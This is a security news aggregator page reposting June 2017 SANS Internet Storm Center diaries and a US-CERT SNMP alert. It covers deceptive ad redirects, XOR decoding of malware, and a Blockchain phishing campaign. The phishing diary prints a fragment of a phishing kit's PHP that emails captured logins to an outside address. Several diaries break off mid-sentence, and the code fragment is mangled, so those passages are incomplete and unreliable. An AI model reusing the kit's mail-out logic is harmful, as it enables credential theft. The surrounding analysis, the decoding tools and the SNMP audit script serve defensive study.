Baanboard.com

Security

ISC Stormcast For Monday, June 12th 2017 https://isc.sans.edu/podcastdetail.html?id=5538, (Mon, Jun 12th)

SANS Internet Storm Center - June 12, 2017 - 1:20am
(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categories: Security

An Occasional Look in the Rear View Mirror, (Sat, Jun 10th)

SANS Internet Storm Center - June 10, 2017 - 2:01pm

With two new drivers in my home, I am training them to occasionally look in the rear view mirror of their car as an effective way to increase their situational awareness when driving. What if this principle were applied to the area of hardware and software inventory? Perhaps in the form of a quarterly reminder to consider CIS Critical Security Controls 1 and 2, which call for an objective look at hardware and software that might not be as shiny and new. Intentionally searching for this type of deferred maintenance could very well find unnecessary risk that is imposed on the entire organization.

Some organizations have an interesting approach: for every new tool purchased, two tools must also be retired. What a novel section to include in the business justification for the next new tool. Take a look in the rear view mirror every once in a while, particularly at the area of technology retirement, to make sure you don't just continue to increase the collection of tools. Who knows what might be discovered.

What grade would you give yourself in the discipline of technology retirement? Please leave what works for you in our comments section below.

Russell Eubanks

ISC Handler

SANS Instructor

@russelleubanks


ISC Stormcast For Friday, June 9th 2017 https://isc.sans.edu/podcastdetail.html?id=5536, (Fri, Jun 9th)

SANS Internet Storm Center - June 9, 2017 - 2:25am

Severity: Important VMware Horizon View Client Patch https://www.vmware.com/security/advisories/VMSA-2017-0011.html, (Thu, Jun 8th)

SANS Internet Storm Center - June 9, 2017 - 1:01am

Tom Webb


ISC Stormcast For Thursday, June 8th 2017 https://isc.sans.edu/podcastdetail.html?id=5534, (Thu, Jun 8th)

SANS Internet Storm Center - June 8, 2017 - 1:35am

Summer STEM for Kids, (Thu, Jun 8th)

SANS Internet Storm Center - June 8, 2017 - 1:19am

It's summertime and your little hackers need something to keep them busy! Let's look at some of the options for kids to try out. I've tried out each of these programs and have had good luck with them. Please post in the comments any site you have used successfully to teach your kids STEM or IT security. I'll keep this list up on my GitHub: https://github.com/tcw3bb/ISC_Posts/blob/master/Kids_Coding_Security_Resource.

Coding Options (4-7)

Scratch jr (app) http://pbskids.org/learn/scratchjr/

  • A GUI application that uses easy-to-use building blocks to make programs. You will need to help your kids, as there is no walkthrough within the app.

Coji (Robot and App) http://wowwee.com/coji

  • Coji is a robot that you move around your house with an app. The app also has games to teach coding basics. About half of the puzzles are too hard for him, but it's fun.

Coding Options (7-12)

Scratch (PC) https://scratch.mit.edu/

  • Scratch is an application that allows you to code using building blocks. This version has more complex logic options.

Hour of code(PC). https://code.org/learn

  • Learn coding basics using a browser in about an hour per section. Lots of different themes to keep kids interested.

Made with code(PC) http://Madewithcode.com

  • Similar to Hour of Code but more slanted towards girls. Great for all, though.

Minecraft modding (PC) http://learntomod.com

  • They use building blocks like Scratch to make Minecraft mods. There are lots of options to play, and kids learn by watching videos for each learning objective and earn badges.

Scratch Books

Coding Games in Scratch (Jon Woodcock)

20 Games to Create with Scratch (Max Wainewright)

Scratch Coding Cards (Natalie Rusk)

  • These cards can be done one at a time, to do coding in little bites.

Electronics

Snap Circuits http://www.snapcircuits.net/

  • These are the replacement for the ScienceFair 150-in-1 projects I grew up with. Build simple electronics by snapping together electronic parts.

Makeblock http://www.makeblock.com/

  • Arduino kit that plugs into Scratch. There are lots of cool projects depending on which kits you have. I bought several when Radio Shack was closing in my area.

--

Tom Webb

@twsecblog


Deceptive Advertisements: What they do and where they come from, (Wed, Jun 7th)

SANS Internet Storm Center - June 7, 2017 - 5:12pm

About a week ago, a reader asked for help with a nasty typo squatting incident:

The site, yotube.com, at the time redirected to fake tech support sites. These sites typically pop up a message alerting the user of a made-up problem and offer a phone number for tech support.

Investigating the site, I found ads, all of which can be characterized as deceptive. In addition to offering tech support, some of the ads offered video players for download or even suggested that the user has to log in to the site, offering a made-up login form. If a user clicks on these ads, the user is sent through a number of different redirects. For example (URL parameters removed to make this more readable):

hxxp://inclk.com/adServe/feedclick (URL the ad linked to)
hxxp://p185689.inclk.com/adServe/adClick
hxxp://wkee.reddhon.com/d7477cb3-70f0-4861-a578-a5b6ef73a167
hxxp://www.rainbow-networks.com/RBN3seB
hxxp://critical-system-failure8466.97pn76810224.error-notification-3.club/ (fake tech support page)

hxxp://inclk.com/adServe/banners
hxxp://inclk.com/adServe/banners/findBanner
hxxp://service.skybrock.com/serving/
hxxp://cdn.glisteningapples.pro/lp/

At the time, the ads were hosted at inclk.com.

Below this dialog, a hard to read disclaimer is displayed (I left the colors as is).

VirusTotal identifies the resulting download as adware. I didn't

Now, these ads were after all displayed on my page, and I had an account set up with RevenueHits. So I decided to inquire about the deceptive ads I received:

I just started testing revenue hits, and all the ads I receive are downloads of fraudulent media players. Is there a way to filter these ads? Do you have a way to flag ads as inappropriate? thx.

The moment I submitted this request, I received the following (obviously automated) response:

Johannes Ullrich

Your account was automatically banned by our system, due to fraudulent traffic sources.

Please notice that once our system marks your traffic as fraud, there is nothing I can do to change it.

Please check again all your traffic sources.

Regards

Support team

The ads continued to be displayed on my site. A business day later, I received a manual reply to my initial question:

Hi Johannes
Thank you for reaching out to us.

Our Design team is working these days on the diversity of our ads.

We are committed to achieving the highest performance possible for you. Therefore, the ads you see today are the best performing ones on your traffic.

You can remove some of them from your site, but note that it might affect your results.

I still receive exclusively deceptive ads from RevenueHits. However, at least the results are not that bad. RevenueHits would pay me $0.36 for the one click-through it counted. I haven't

---
Johannes B. Ullrich, Ph.D., Dean of Research, SANS Technology Institute

ISC Stormcast For Wednesday, June 7th 2017 https://isc.sans.edu/podcastdetail.html?id=5532, (Tue, Jun 6th)

SANS Internet Storm Center - June 7, 2017 - 12:55am

Malware and XOR - Part 2, (Tue, Jun 6th)

SANS Internet Storm Center - June 6, 2017 - 9:39pm

In part 1, I gave some examples to recover XOR keys from encoded executables if we knew some of the content of the unencoded file (known plaintext attack).

In this part, I give some examples to automate this process using my xor-kpa tool.

xor-kpa.py takes 2 files as input: the first file contains the plaintext, and the second file the encoded file. We are going to search for the string "This program cannot be run in DOS mode".

xor-kpa displays some potential keys, in ascending order of extra characters.

Value Key is the recovered key, and Key (hex) is the hexadecimal representation of the key (in case the key would not be printable).

Keystream is the keystream, from which xor-kpa extracted the key by looking for repeating strings.

Extra is the difference between the length of the keystream and the length of the key. If this is just one character, the proposed key is very unlikely to be the encoding key. Output can be filtered by requiring a minimum value for extra by using option -e.

Divide is the number of times the key is present in the keystream.

And counts reports the number of times the same key was recovered at different positions in the encoded file.

So by using this known plaintext (This program cannot be run in DOS mode) with the encoded file, xor-kpa proposes a number of keys. In this example, the key with the highest number of extra characters is the actual encoding key (Password).

Another way to recover the key, which we saw yesterday, is looking for sequences of null bytes (0x00) that have been encoded. xor-kpa.py can do this too, by giving 000000000000... as plaintext. We could create a file containing null bytes, but it

The key was recovered, and the count is very high, so it

Please post a comment if you have ideas for other known plaintexts in executables.

Didier Stevens
Microsoft MVP Consumer Security
blog.DidierStevens.com DidierStevensLabs.com


ISC Stormcast For Tuesday, June 6th 2017 https://isc.sans.edu/podcastdetail.html?id=5530, (Tue, Jun 6th)

SANS Internet Storm Center - June 6, 2017 - 1:35am

TA17-156A: Reducing the Risk of SNMP Abuse

US-CERT - Alerts - June 6, 2017 - 1:11am
Original release date: June 05, 2017
Systems Affected

SNMP enabled devices

Overview

The Simple Network Management Protocol (SNMP) may be abused to gain unauthorized access to network devices. SNMP provides a standardized framework for a common language that is used for monitoring and managing devices in a network.

This Alert provides information on SNMP best practices, along with prevention and mitigation recommendations.

Description

SNMP depends on secure strings (or “community strings”) that grant access to portions of devices’ management planes. Abuse of SNMP could allow an unauthorized third party to gain access to a network device. 

SNMPv3 should be the only version of SNMP employed because SNMPv3 has the ability to authenticate and encrypt payloads. When either SNMPv1 or SNMPv2 are employed, an adversary could sniff network traffic to determine the community string. This compromise could enable a man-in-the-middle or replay attack.

Although SNMPv1 and SNMPv2 have similar characteristics, 64-bit counters were added to SNMPv2 so it could support faster interfaces. SNMPv3 replaces the simple/clear text password sharing used in SNMPv2 with more securely encoded parameters. All versions run over the User Datagram Protocol (UDP).

Simply using SNMPv3 is not enough to prevent abuse of the protocol. A safer approach is to combine SNMPv3 with management information base (MIB) whitelisting using SNMP views. This technique ensures that even with exposed credentials, information cannot be read from or written to the device unless the information is needed for monitoring or normal device re-configuration. The majority of devices that support SNMP contain a generic set of MIBs that are vendor agnostic. This approach allows the object identifier (OID) to be applied to devices regardless of manufacturer.

Impact

A remote attacker may abuse SNMP-enabled network devices to access an organization’s network infrastructure.

Solution

A fundamental way to enhance network infrastructure security is to safeguard networking devices with secure configurations. US-CERT recommends that administrators:

  • Configure SNMPv3 to use the highest level of security available on the device; this would be authPriv on most devices. authPriv includes authentication and encryption features, and employing both features enhances overall network security. Some older images may not contain the cryptographic feature set, in which case authNoPriv needs to be used. However, if the device does not support Version 3 authPriv, it should be upgraded.
  • Ensure administrative credentials are properly configured with different passwords for authentication and encryption. In configuring accounts, follow the principle of least privilege. Role separation between polling/receiving traps (reading) and configuring users or groups (writing) is imperative because many SNMP managers require login credentials to be stored on disk in order to receive traps.
  • Refer to your vendor’s guidance for implementing SNMP views. SNMP view is a command that can be used to limit the available OIDs. When OIDs are included in the view, all other MIB trees are inherently denied. The SNMP view command must be used in conjunction with a predefined list of MIB objects.
  • Apply extended access control lists (ACLs) to block unauthorized computers from accessing the device. Access to devices with read and/or write SNMP permission should be strictly controlled. If monitoring and change management are done through separate software, then they should be on separate devices.
  • Segregate SNMP traffic onto a separate management network. Management network traffic should be out-of-band; however, if device management must coincide with standard network activity, all communication occurring over that network should use some encryption capability. If the network device has a dedicated management port, it should be the sole link for services like SNMP, Secure Shell (SSH), etc.
  • Keep system images and software up-to-date.
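As an added example, not part of the US-CERT alert, the following Python script audits a net-snmp style snmpd.conf against the recommendations above: it flags SNMPv1/v2c community strings (and ones with no source restriction), SNMPv3 users below authPriv, users not confined to a view, and users whose authentication and privacy passphrases are the same. It assumes net-snmp's rocommunity/rouser/createUser/view directive syntax; the configuration text and its passphrases are constructed.

```python
import shlex

# Constructed snmpd.conf: legacy community strings and a weak SNMPv3 user
# left beside a hardened authPriv user confined to a MIB view.
SAMPLE_CONF = """\
# SNMPv1/v2c community strings; the first one accepts any source address
rocommunity public
rwcommunity private 10.0.0.0/8
# SNMPv3 user that authenticates but does not encrypt, and can read the whole MIB
rouser monitor auth
createUser monitor SHA "SamePass123" AES "SamePass123"
# hardened: authPriv with distinct passphrases, restricted to view 'sysview'
createUser nms SHA "auth-pass-constructed" AES "priv-pass-constructed"
rouser nms priv -V sysview
view sysview included .1.3.6.1.2.1.1
view sysview included .1.3.6.1.2.1.2
"""

LEVELS = ("noauth", "auth", "priv")


def parse(conf: str):
    """Yield (line number, lower-cased directive, argument list) per directive."""
    for no, raw in enumerate(conf.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        tokens = shlex.split(line)   # keeps quoted passphrases as one token
        yield no, tokens[0].lower(), tokens[1:]


def audit(conf: str) -> list:
    """Return (line, code, detail) findings mapped to the alert's recommendations."""
    findings = []
    for no, directive, args in parse(conf):
        if directive in ("rocommunity", "rwcommunity", "rocommunity6", "rwcommunity6"):
            # Recommendation 1: v1/v2c carry the community string in clear text
            findings.append((no, "V1V2C", f"community '{args[0]}' is SNMPv1/v2c"))
            if len(args) < 2:            # Recommendation 4: no source restriction
                findings.append((no, "NO_ACL", "community accepts any source address"))
        elif directive in ("rouser", "rwuser"):
            user, rest = args[0], args[1:]
            level = "auth"               # net-snmp's default minimum level
            if rest and rest[0].lower() in LEVELS:
                level, rest = rest[0].lower(), rest[1:]
            if level != "priv":          # Recommendation 1: authPriv
                findings.append((no, "NOT_AUTHPRIV", f"user '{user}' level is {level}"))
            # Recommendation 3: a view (-V name) or an OID subtree must bound access
            if "-V" not in rest and not any(t.startswith(".") for t in rest):
                findings.append((no, "NO_VIEW", f"user '{user}' may access the whole MIB"))
        elif directive == "createuser":
            # createUser [-e ENGINEID] USER (MD5|SHA) AUTHPASS [DES|AES] [PRIVPASS]
            if args and args[0] == "-e":
                args = args[2:]
            if len(args) < 4:            # no privacy protocol: cannot do authPriv
                findings.append((no, "NO_PRIV_KEY", f"user '{args[0]}' has no privacy key"))
            elif len(args) == 4 or args[2] == args[4]:
                # Recommendation 2: distinct passwords (net-snmp reuses the auth
                # passphrase for privacy when the privacy passphrase is omitted)
                findings.append((no, "SAME_PASS", f"user '{args[0]}' reuses auth pass for priv"))
    return findings


if __name__ == "__main__":
    for line, code, detail in audit(SAMPLE_CONF):
        print(f"line {line:2d} {code:<13} {detail}")
```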
References

Revision History
  • June 5, 2017: Initial Release


Malware and XOR - Part 1, (Mon, Jun 5th)

SANS Internet Storm Center - June 5, 2017 - 11:01pm

Malware authors often encode their malicious payload, to avoid detection and make analysis more difficult.

I regularly see payloads encoded with the XOR function. Often, they will use a sequence of bytes as encoding key. For example, let's take Password as encoding key. Then the first byte of the payload is XORed with the first byte of the key (P), the second byte of the payload is XORed with the second byte of the key (a), and so on until all bytes of the key have been used. And then we start again with the first byte of the key: the ninth byte of the payload is XORed with the first byte of the key (P), ...


So just by opening a XOR encoded PE file with a binary editor, we can see the repeating key, provided that the key is smaller than the sequences of 0x00 bytes.

Second interesting property of the XOR function: if you XOR the original file (cleartext) with the encoded file (ciphertext), you get the key (or to be more precise, the keystream).

Let's take another example. We know that in many PE files, you can find the string "This program cannot be run in DOS mode".

So if we have the encoded file, and the partially unencoded file, we can also recover the key, provided again that the key is smaller than the unencoded text, and that we know where to line-up the encoded and unencoded text.
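As an added example (not Didier Stevens' xor-kpa tool, which part 2 above describes), here is a Python implementation of the recovery methods from both of these diaries: the known plaintext is slid over the encoded file, plaintext XOR ciphertext gives the keystream at each offset, and a keystream that repeats with a short period yields a candidate key, reported with the extra, divide and count figures that part 2 explains. Passing null bytes as the plaintext reproduces the 0x00-run trick from this part. The PE-like input and the key Password are constructed for the example.

```python
from collections import Counter


def xor_bytes(data: bytes, key: bytes) -> bytes:
    """XOR data with a repeating key; the same call decodes what it encoded."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def shortest_period(stream: bytes) -> int:
    """Smallest p for which stream is a (possibly truncated) repetition of
    its first p bytes; returns len(stream) when nothing repeats."""
    for p in range(1, len(stream)):
        if all(stream[i] == stream[i % p] for i in range(p, len(stream))):
            return p
    return len(stream)


def xor_kpa(plaintext: bytes, encoded: bytes, min_extra: int = 1) -> list:
    """Slide the known plaintext over the encoded file.  At every offset
    plaintext XOR ciphertext is the keystream; if that keystream repeats with
    a period shorter than itself, the repeating unit is a candidate key.
    Rows carry the fields xor-kpa prints: extra (keystream length minus key
    length), divide (times the key fits in the keystream) and count (offsets
    that produced the same key), sorted ascending by extra like the tool."""
    n = len(plaintext)
    seen = Counter()
    for off in range(len(encoded) - n + 1):
        keystream = xor_bytes(encoded[off:off + n], plaintext)
        p = shortest_period(keystream)
        extra = n - p
        if extra < min_extra:
            continue
        unit = keystream[:p]
        # keystream[0] came from key[off % p]; rotate the unit so the
        # candidate is expressed as the encoder applied it from file offset 0
        key = bytes(unit[(j - off) % p] for j in range(p))
        seen[(key, extra, n // p)] += 1
    rows = [{"key": k, "extra": e, "divide": d, "count": c}
            for (k, e, d), c in seen.items()]
    rows.sort(key=lambda r: (r["extra"], r["count"]))
    return rows


# Constructed stand-in for an XOR-encoded PE file: the DOS-stub string
# surrounded by long runs of 0x00, as real headers and section padding have.
KEY = b"Password"
PLAIN = (b"MZ" + b"\x00" * 62
         + b"This program cannot be run in DOS mode.\r\n$"
         + b"\x00" * 128 + b"PE\x00\x00" + b"\x00" * 200)
ENCODED = xor_bytes(PLAIN, KEY)

DOS_STUB = b"This program cannot be run in DOS mode"
NULLS = b"\x00" * 32   # the "000000..." plaintext from part 2


def best_key(plaintext: bytes, encoded: bytes) -> dict:
    """The candidate with the most extra characters (last row), or {} if none."""
    rows = xor_kpa(plaintext, encoded)
    return rows[-1] if rows else {}


if __name__ == "__main__":
    for name, pt in (("DOS stub", DOS_STUB), ("null bytes", NULLS)):
        row = best_key(pt, ENCODED)
        print(f"{name:10s} key={row['key']!r} hex={row['key'].hex()} "
              f"extra={row['extra']} divide={row['divide']} count={row['count']}")
    print("decoded OK:", xor_bytes(ENCODED, best_key(NULLS, ENCODED)["key"]) == PLAIN)
```

Candidates with extra of only 1 are the chance coincidences the diary warns about; the true key is the row with the most extra characters, and with the null-byte plaintext its count is high because every window inside a 0x00 run yields it.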

In a next diary entry, I will show a tool to automate this analysis process.

Didier Stevens
Microsoft MVP Consumer Security
blog.DidierStevens.com DidierStevensLabs.com


ISC Stormcast For Monday, June 5th 2017 https://isc.sans.edu/podcastdetail.html?id=5528, (Mon, Jun 5th)

SANS Internet Storm Center - June 5, 2017 - 1:25am

Phishing Campaigns Follow Trends, (Fri, Jun 2nd)

SANS Internet Storm Center - June 2, 2017 - 9:23am

Those phishing emails that we receive every day in our mailboxes are often related to key players in different fields:

  • Internet actors: Google, Yahoo!, Facebook, ...
  • Software or manufacturers: Apple, Microsoft, Adobe, ...
  • Financial services: PayPal, BoA, name your preferred bank, ...
  • Services: DHL, eBay, ...

But the landscape of online services is ever changing, and new actors (and more precisely their customers) become new interesting targets. Yesterday, while hunting, I found for the first time a phishing page trying to lure the Bitcoin operator BlockChain. Blockchain [1] is a key player in the management of

Hopefully, the webshell isn't

    $from = From: b hacker@forever.org\n
    $from .= MIME-Version: 1.0\r\n
    $from .= charset=ISO-8859-1\r\n
    if(@$_GET[accedi]==login){
        mail(carlosromero19871@gmail.com
        header( Location: richiesta_otp.html
    }else{

Note that the login procedure on BlockChain is extremely strong: 2FA authentication, and a one-time link is sent via email to approve all login attempts. Be sure to activate them if you're a BlockChain customer.

The fact that Bitcoin, the digital currency, is getting more and more popular makes it a new interesting target for attackers. And this is also the case in corporate environments: there is a trend of companies keeping a reserve of Bitcoins to prevent possible ransomware attacks! [3]

[1] https://www.blockchain.com
[2] http://klimatika.com.ua/block/
[3] https://www.technologyreview.com/s/601643/companies-are-stockpiling-bitcoin-to-pay-off-cybercriminals/

Xavier Mertens (@xme)
ISC Handler - Freelance Security Consultant
PGP Key


ISC Stormcast For Friday, June 2nd 2017 https://isc.sans.edu/podcastdetail.html?id=5526, (Fri, Jun 2nd)

SANS Internet Storm Center - June 2, 2017 - 1:05am

©2001-2017 - Baanboard.com - Baanforums.com